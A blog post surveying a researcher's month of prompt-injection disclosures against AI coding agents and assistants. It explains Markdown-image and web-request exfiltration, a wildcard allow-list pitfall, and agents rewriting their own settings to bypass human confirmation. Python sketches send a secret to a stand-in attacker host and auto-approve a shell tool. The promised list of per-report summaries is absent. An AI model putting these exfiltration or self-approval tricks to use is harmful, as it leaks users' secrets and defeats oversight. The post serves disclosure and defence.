The Summer of Johann: prompt injections as far as the eye can see

15th August 2025

Independent AI researcher Johann Rehberger (previously) has had an absurdly busy August. Under the heading The Month of AI Bugs he has been publishing one report per day across an array of different tools, all of which are vulnerable to various classic prompt injection problems. This is a fantastic and horrifying demonstration of how widespread and dangerous these vulnerabilities still are, almost three years after we first started talking about them.

Johann’s published research in August so far covers ChatGPT, Codex, Anthropic MCPs, Cursor, Amp, Devin, OpenHands, Claude Code, GitHub Copilot and Google Jules. There’s still half the month left!

Here are my one-sentence summaries of everything he’s published so far:

Common patterns

There are a number of patterns that show up time and time again in the above list of disclosures:

  • Prompt injection. Every single one of these attacks starts with exposing an LLM system to untrusted content. There are so many ways malicious instructions can get into an LLM system—you might send the system to consult a web page or GitHub issue, or paste in a bug report, or feed it automated messages from Slack or Discord. If you can avoid untrusted instructions entirely you don’t need to worry about this... but I don’t think that’s at all realistic given the way people like to use LLM-powered tools.
  • Exfiltration attacks. As seen in the lethal trifecta, if a model has access to secret information and is also exposed to untrusted content, you have to be very confident there’s no way for those secrets to be stolen and passed off to an attacker. There are so many ways this can happen:
    • The classic Markdown image attack, as seen in dozens of previous systems (see the sketch after this list).
    • Any tool that can make a web request—a browser tool, or a Bash terminal that can use curl, or a custom view_text_website tool, or anything that can trigger a DNS resolution.
    • Systems that allow-list specific domains need to be very careful about things like *.azure.net which could allow an attacker to host their own logging endpoint on an allow-listed site.
  • Arbitrary command execution—a key feature of most coding agents—is obviously a huge problem the moment a prompt injection attack can be used to trigger those tools.
  • Privilege escalation—several of these exploits involved an allow-listed file write operation being used to modify the settings of the coding agent to add further, more dangerous tools to the allow-listed set.
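
To make the exfiltration channels concrete, here is a minimal Python sketch of the Markdown image trick and the wildcard allow-list pitfall. The attacker hostname and the naive_is_allowed helper are invented for illustration; this is not the code of any of the tools above.

```python
from urllib.parse import quote, urlparse

# Invented attacker endpoint, for illustration only.
ATTACKER = "https://attacker-logs.example.com/pixel.png"


def markdown_image_payload(secret: str) -> str:
    """Markdown that an injected instruction might ask the model to emit.

    A chat client that renders this output and auto-fetches images will
    issue a GET request carrying the secret in the query string; no
    explicit "send data" tool is needed, rendering alone leaks it.
    """
    return f"![loading]({ATTACKER}?q={quote(secret)})"


def naive_is_allowed(url: str) -> bool:
    """Hypothetical allow-list check equivalent to *.azure.net.

    Anything an attacker can host under the allow-listed suffix, such as
    their own logging endpoint, passes this check.
    """
    host = urlparse(url).hostname or ""
    return host == "azure.net" or host.endswith(".azure.net")


print(markdown_image_payload("API_KEY=abc123"))
# ![loading](https://attacker-logs.example.com/pixel.png?q=API_KEY%3Dabc123)
print(naive_is_allowed("https://attacker-controlled.azure.net/log?q=stolen"))
# True
```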

The AI Kill Chain

Inspired by my description of the lethal trifecta, Johann has coined the term AI Kill Chain to describe a particularly harmful pattern:

  • prompt injection leading to a
  • confused deputy that then enables
  • automatic tool invocation

The automatic piece here is really important: many LLM systems such as Claude Code attempt to defend against prompt injection attacks by asking humans to confirm every tool action triggered by the LLM... but there are a number of ways this might be subverted, most notably the above attacks that rewrite the agent’s configuration to allow-list future invocations of dangerous tools.
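
To see why that matters, here is a minimal sketch, not the code of any specific agent, of a confirmation gate whose allow-list lives in a settings file the agent itself is permitted to write (the file name and tool names are invented):

```python
import json
from pathlib import Path

# Hypothetical per-project settings file, writable via an auto-approved
# file-write tool.
SETTINGS = Path("agent_settings.json")
SETTINGS.write_text(json.dumps({"auto_approved_tools": ["read_file", "write_file"]}))


def needs_human_confirmation(tool_name: str) -> bool:
    allowed = json.loads(SETTINGS.read_text())["auto_approved_tools"]
    return tool_name not in allowed


# The dangerous tool is gated, so the human would normally be asked:
print(needs_human_confirmation("run_shell"))  # True

# But an injected instruction can use the auto-approved file write to edit
# the settings file itself...
config = json.loads(SETTINGS.read_text())
config["auto_approved_tools"].append("run_shell")
SETTINGS.write_text(json.dumps(config))

# ...after which the dangerous tool call sails through with no prompt at all.
print(needs_human_confirmation("run_shell"))  # False
```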

A lot of these vulnerabilities have not been fixed

Each of Johann’s posts includes notes about his responsible disclosure process for the underlying issues. Some of them were fixed, but in an alarming number of cases the problem was reported to the vendor, who then failed to fix it within a 90 or 120 day disclosure window.

Johann includes versions of this text in several of the above posts:

To follow industry best-practices for responsible disclosure this vulnerability is now shared publicly to ensure users can take steps to protect themselves and make informed risk decisions.

It looks to me like the ones that were not addressed were mostly cases where the utility of the tool would be quite dramatically impacted by shutting down the described vulnerabilities. Some of these systems are simply insecure as designed.

Back in September 2022 I wrote the following:

The important thing is to take the existence of this class of attack into account when designing these systems. There may be systems that should not be built at all until we have a robust solution.

It looks like we built them anyway!
